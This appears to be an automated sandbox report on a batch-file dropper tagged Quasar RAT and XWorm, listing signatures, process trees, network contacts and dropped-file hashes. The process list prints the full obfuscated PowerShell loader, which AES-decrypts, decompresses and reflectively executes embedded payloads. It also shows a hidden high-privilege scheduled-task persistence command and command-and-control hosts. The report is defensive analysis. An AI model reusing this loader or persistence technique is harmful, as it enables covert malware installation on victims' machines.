Malware Analysis Report

2024-10-23 21:29

Sample ID 240413-wvprcsae8w
Target Client-built.bat
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9

Threat Level: Known bad

The file Client-built.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Quasar RAT

Quasar payload

Xworm

Detect Xworm Payload

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-13 18:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win10-20240404-en

Max time kernel

59s

Max time network

60s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 4248 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4672 wrote to memory of 4248 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4248 wrote to memory of 3708 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4248 wrote to memory of 3708 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 4060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 2180 wrote to memory of 4060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_267_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_267.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_267.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_267.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_267.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_267.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp

Files

memory/4672-4-0x00000271D6F50000-0x00000271D6F72000-memory.dmp

memory/4672-5-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/4672-6-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-7-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-10-0x00000271D7150000-0x00000271D71C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yc3dmam0.bbn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4672-21-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-26-0x00000271BED20000-0x00000271BED28000-memory.dmp

memory/4672-27-0x00000271D74B0000-0x00000271D75EA000-memory.dmp

memory/1872-36-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/1872-38-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-39-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-54-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-72-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f404a1d6b3435ba3550ba6cbb87c6fbb
SHA1 6f61023a2f8114372a4ae62155dc86d066e3bfa8
SHA256 6ad86a2c8c7ab664622ab8e5a26d437c3f358fdc99f7cb15fc8279cec40eb059
SHA512 4fafaa336308e689e06808479a2d1e05fdc2a43bce6807b009527e06274821cc7d80c4fca7b50a1d826293c458e5cd5bac3f83dc804b59eef466ed288d152639

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Roaming\startup_str_267.vbs

MD5 90d9f9c1ee8b2748879d3f0d7692e6c5
SHA1 9a88b51f56d0c106bf2e13585b96acfef536cb90
SHA256 15d67a91884058d7464b1939c42db9f37a9317f7d43115f3613f463af7389a23
SHA512 bd961df405cc444200f26e157dec1fa19377f88d29092726a604b1e90fde4c50c9a56d15fac9dce7b9a292f75e11c011ee98f341bbe80d756f49af5089c96bd4

C:\Users\Admin\AppData\Roaming\startup_str_267.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/2180-88-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-90-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/2180-104-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/4672-110-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-113-0x000002613E490000-0x000002613E7B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/4060-123-0x0000000000F20000-0x0000000000F2E000-memory.dmp

memory/4060-124-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-125-0x000002613EEC0000-0x000002613EF10000-memory.dmp

memory/2180-126-0x000002613F2C0000-0x000002613F372000-memory.dmp

memory/2180-127-0x000002613F550000-0x000002613F712000-memory.dmp

memory/4060-129-0x000000001BCA0000-0x000000001BCB0000-memory.dmp

memory/2180-146-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-147-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/2180-148-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/4060-157-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/4060-158-0x000000001BCA0000-0x000000001BCB0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win10v2004-20240412-en

Max time kernel

54s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4992 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
